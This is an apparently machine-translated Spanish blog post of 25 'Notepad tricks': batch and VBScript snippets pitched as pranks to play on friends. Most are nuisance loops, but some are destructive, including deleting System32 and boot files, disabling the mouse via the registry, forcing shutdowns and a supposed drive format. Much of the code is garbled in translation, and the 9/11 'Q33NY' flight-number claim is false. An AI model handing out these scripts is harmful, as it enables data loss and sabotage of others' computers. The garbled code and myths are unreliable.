Los 25 mejores trucos, hachazos y comandos del cuaderno de notas en 2020

Los 25 mejores trucos, hachazos y comandos del cuaderno de notas en 2020

Hoy estamos aquí con los últimos y mejores trucos de cuaderno de notas en 2020. Con estos trucos, puedes divertirte mucho con tus amigos. Estos trucos son muy simples y fáciles de implementar. Sólo tienes que seguir el siguiente post para continuar.

Notepad es un programa de utilidad para el sistema operativo Windows. Este software de utilidad ayuda a codificar varios programas que pueden incluso controlar el funcionamiento del sistema a través de los cuales puedes realizar muchos trucos en él. Estos trucos son muy interesantes y puedes usarlos para hacer bromas a tus amigos.

La mayoría de las veces usamos el bloc de notas sólo para escribir, pero este artículo cambiará su experiencia con el bloc de notas. Con estos trucos, puedes divertirte mucho con tus amigos. Estos trucos son muy simples y fáciles de implementar. Sólo tienes que seguir el siguiente post para continuar.

2…20 Mejores Trucos de Bloc de Notas, Hacks & Comandos en 2020

Te divertirás mucho. Sólo tienes que copiar el código de aquí y pegarlo en el bloc de notas y guardarlo con una extensión .bat. Sólo lee todos los trucos que se dan a continuación.

1. Truco del bloc de notas para probar el antivirus

Con este truco, puedes comprobar fácilmente si tu antivirus funciona perfectamente o no.

X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*

Guárdalo como test.exe y ejecuta el archivo y comprueba si tu antivirus lo detecta, entonces tu antivirus funciona perfectamente, de lo contrario cambia de antivirus.

2. Hacer un libro de registro personal o un diario

Copie el código de abajo y péguelo en el bloc de notas y guárdelo como log.txt.

.LOG

Ahora, cada vez que abra este archivo de registro, tendrá todos los detalles de registro con fecha y hora.

3. Repita constantemente cualquier mensaje

Este es uno de los mejores trucos del Bloc de Notas que repetirá cualquier mensaje en la pantalla del ordenador repetidamente. Sólo copie el siguiente código y péguelo en el bloc de notas y guárdelo como mensaje.bat.

@ECHO off :Begin msg * Hola msg * ¿Te estás divirtiendo? msg * Lo estoy! msg * Vamos a divertirnos juntos! msg * Porque has estado o-w-n-e-d GOTO BEGIN

4. 4. Sacar continuamente la unidad de CD usando el bloc de notas

Este es mi truco favorito, ya que este truco saca continuamente la unidad de CD cada vez que intentas cerrarla.Sólo copia el código de abajo y pégalo en el bloc de notas y guárdalo como cd.vbs.

Set oWMP = CreateObject(WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count;= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

5. Transmite a tu amigo un mensaje y apaga su ordenador

Sólo copie el código de abajo y péguelo en el bloc de notas y guárdelo como cualquiernombre.bat.

@echo off msg * Hey, ¿cómo estás apagado -c Error! Usted es realmente un estúpido! -s

6. Bloc de notas Truco para escribir lentamente

Este truco le permitirá escribir lentamente en la pantalla y para hacerlo, sólo tiene que copiar el siguiente código y guardarlo con cualquiernombre.vbs nombre.

WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject (WScript.Shell)

WshShell.Run bloc de notas

WScript.Sleep 100

WshShell.AppActivar bloc de notas

WScript.Sleep 500

WshShell.SendKeys Hel

WScript.Sleep 500

WshShell.SendKeys lo

WScript.Sleep 500

WshShell.SendKeys , ho

WScript.Sleep 500

WshShell.SendKeys w a

WScript.Sleep 500

WshShell.SendKeys re

WScript.Sleep 500

WshShell.SendKeys tú

WScript.Sleep 500

WshShell.SendKeys ?

WScript.Sleep 500

WshShell.SendKeys I a

WScript.Sleep 500

WshShell.SendKeys m g

WScript.Sleep 500

WshShell.SendKeys ood

WScript.Sleep 500

WshShell.SendKeys &qu

WshShell.SendKeys ank

WScript.Sleep 500

WshShell.SendKeys s!

7. Efecto de la matriz

Este código le dará un efecto de matriz en su pantalla, sólo tiene que copiar el siguiente código y pegarlo en el bloc de notas y guardarlo como cualquier nombre.bat.

@ eco off color 02 :start eco %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start

8. Formatear el disco duro usando sólo el bloc de notas

Este código borrará todos los datos de su disco duro. Sólo copie el siguiente código y péguelo en el bloc de notas y guárdelo como cualquiernombre.exe.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

9. Convertir texto en audio usando el bloc de notas

Este es un truco de cuaderno muy guay y este código convertirá tu texto en un archivo de audio. Sólo tienes que copiar el siguiente código y pegarlo en el bloc de notas y guardarlo como text-to-audio.vbs

Dim message, sapi message=InputBox(Introduzca su texto para la conversión-Tech-hacks.org,Hover pc Hacks Text-To-Audio Converter) Set sapi=CreateObject(sapi.spvoice) sapi.Speak message

10. Bloc de notas Truco de impresión Raíz de árbol

Este truco es uno de los mejores trucos del bloc de notas que imprimirá una raíz de árbol en su pantalla. Sólo copia el código de abajo, pégalo en el bloc de notas y guárdalo como teekids en el sistema C:windows.

{impresión de la raíz del árbol}

C:Sistema de ventanas

{impresión C:windowssystemwinlog

4*43″[email protected][455] 3hr4~

Nota: Si desea detener los archivos .vbs presione ALT+CTRL+DEL del teclado y abra el administrador de tareas y luego procese la sección y detenga el archivo Wscript que se está ejecutando allí.

11. Cambie su cerradura

Puedes alternar la tecla Capslock del teclado con sólo escribir el código en el Bloc de notas. Asegúrate de guardar el archivo como .vbs y abre el archivo guardado y mira lo que sucede mientras usas la tecla Capslock.

Set wshShell =wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys {CAPSLOCK} loop

12. Mensaje de error falso

Simplemente abre el bloc de notas, pega el código y guarda el archivo como error.vbs. Ahora cuando abra el archivo guardado verá un mensaje de error.

X=Msgbox(Ponga su mensaje aquí,0+16,Ponga el título aquí)

Puedes reemplazar y poner tu mensaje aquí y poner tu título aquí con tus palabras clave.

13. Baile del teclado LED usando el bloc de notas

Simplemente abre el Bloc de Notas e introduce el siguiente código y guarda el archivo como LEDDance.vbs . Una vez que abra el archivo guardado, verá que las tres luces LED del teclado comenzarán a parpadear repetidamente.

Set wshShell =wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys {CAPSLOCK} wshshell.sendkeys {NUMLOCK} wshshell.sendkeys {SCROLLLOCK} loop

14. Crear un archivo protegido por contraseña usando el bloc de notas

Hemos publicado un artículo al respecto. Con la ayuda de nuestro artículo Cómo crear una carpeta protegida por contraseña sin ningún tipo de software, puedes crear una carpeta protegida por contraseña usando el bloc de notas. Lee el post para saber cómo.

15. Abra el bloc de notas continuamente

Esta es la broma perfecta para molestar a tu amigo. Sólo tienes que copiar y pegar el código en el bloc de notas y guardarlo con cualquier nombre con extensión .bat. Puedes enviárselo a tu amigo y hacer que haga clic.

@ECHO OFF

:TOP

START %SYSTEMROOT%NSYSTEM32NNNNNOTEPAD.EXE

GOTO TOP

16. Truco de ataque al World Trade Center

El número de vuelo del avión que se estrelló contra el World Trade Center el 11 de septiembre fue Q33NY. Bueno, puedes llamar a este truco coincidencia pero, te sorprenderá.

Paso 1. Abre el Bloc de Notas y escribe «Q33N» sin las comillas en mayúsculas.

Paso 2. Ahora aumenta el tamaño de la fuente a 72 y cambia la fuente a Wingdings.

Se sorprenderá al descubrir los gráficos visuales.

17. Desactivar los controles del ratón

Bueno, nunca deberías probar esto en tu ordenador, porque este método desactiva los controles del ratón en tu ordenador.

rem Disable Mouse set key=HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesNMouclass reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4

Pega el código anterior en el bloc de notas y guárdalo como disablemouse.bat en tu ordenador.

18. Bush ocultó los hechos

Bueno, este truco sólo funcionará en las versiones antiguas de las ventanas. Sólo tienes que abrir el bloc de notas y escribir bush escondió los hechos o esta aplicación puede romper. Guárdalo y ábrelo de nuevo. Verás diferentes caracteres en lugar de lo que has escrito. Bueno, esto sucede debido a un error que está presente en la versión antigua de Windows.

19. Cambiar el encabezado y el pie de página en el bloc de notas

Bueno, sólo hay que abrir el bloc de notas y luego buscar en Configuración de la página en el bloc de notas y allí en los campos para el encabezado y el pie de página escribir los siguientes códigos.

Los 25 mejores trucos, hachazos y comandos del cuaderno de notas en 2020

&c Centrar los caracteres que siguen a &r Derecha-alinear los caracteres que siguen a &d Imprimir la fecha actual &t Imprimir la hora actual &f Imprimir el nombre del documento &p Imprimir el número de página &l Izquierda-alinear los caracteres que siguen

20. Presiona Enter continuamente

Este truco te permitirá usar la función del botón de entrada que se repite una y otra vez. Sólo tienes que copiar y pegar el siguiente código en el bloc de notas:

Set wshShell = wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys ~(enter) loop

Guarda el archivo en formato .vbs para ver la magia.

21. Borrar los archivos de inicio

Bueno, esto es algo que no deberías probar en tu ordenador a menos que estés dispuesto a perder todos tus datos. Este código eliminará los archivos que ayudan a tu ordenador durante el inicio.

@ECHO OFF ATTRIB -R -S -H C:AUTOEXEC.BAT DEL C:AUTOEXEC.BAT ATTRIB -R -S -H C:NBOT.INI DEL C:NBOT. INI ATTRIB -R -S -H C:NNTLDR DEL C:NNTLDR ATTRIB -R -S -H C:NWINDOWSNWIN.INI DEL C:NWINDOWSNWIN.INI

Guarda el archivo en formato .bat. Apagará tu computadora y borrará todos los archivos de inicio importantes. No hay opción de retroceso. Por lo tanto, debes ser consciente de lo que vas a hacer. Por favor, no uses el código anterior para dañar a nadie.

22. Golpea el retroceso continuamente

Bueno, esta es una de las cosas más divertidas que puedes hacer para molestar a alguien. Este truco hará que el golpe retroceda continuamente. Sólo tienes que copiar y pegar el código dado abajo en el archivo del bloc de notas:

MsgBox Retroceder una y otra vez y AGAIN Set wshShell =wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys {bs} loop

Necesitas guardar el archivo del Bloc de notas en formato .vbs para que funcione. Para detener el guión, necesitas usar el Administrador de Tareas de Windows.

23. Borrar archivos del sistema32 usando el bloc de notas

Bueno, este es otro truco del bloc de notas para devastar un PC. Este truco del cuaderno de notas borrará los archivos del System32 que conducen a la falla del sistema. No es aconsejable implementar el truco, pero este código tiene el poder de apagar cualquier ordenador que funcione en minutos.

DEL C:N-SISTEMA DE VENTANAS32*.*/Q

Asegúrate de guardar el archivo del bloc de notas en formato .bat.

24. Escriba cualquier frase una y otra vez

Bueno, este es otro divertido truco de bloc de notas que puede ser usado para gastar una broma a los amigos. Este truco del bloc de notas escribirá cualquier cosa una y otra vez y otra vez. Los usuarios necesitan cerrar manualmente el proceso del administrador de tareas para salir del bucle de escritura. Aquí está el código.

Set wshShell = wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys Ill be typed again and again loop

Asegúrate de guardar el archivo del bloc de notas en formato .vbs.

25. Forzar a las ventanas a cerrarse

Este es otro truco del bloc de notas que apagará a la fuerza tu ordenador. Sólo tienes que introducir el código dado en el bloc de notas y guardarlo en formato .bat. Aquí está el código.

@echo apagar ordenador -c «dormir bien» -s

Asegúrate de guardar el bloc de notas en formato .bat

Así que arriba están los últimos mejores trucos de cuaderno de notas 2019.Con estos trucos de bloc de notas, puedes hacer bromas fácilmente con tus amigos y divertirte mucho con ellos y tener una gran experiencia con el bloc de notas. Espero que te guste el post, no olvides de compartirlo con tus amigos y deja un comentario abajo sobre cualquier consulta relacionada.

Deja un comentario

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información. ACEPTAR

Aviso de cookies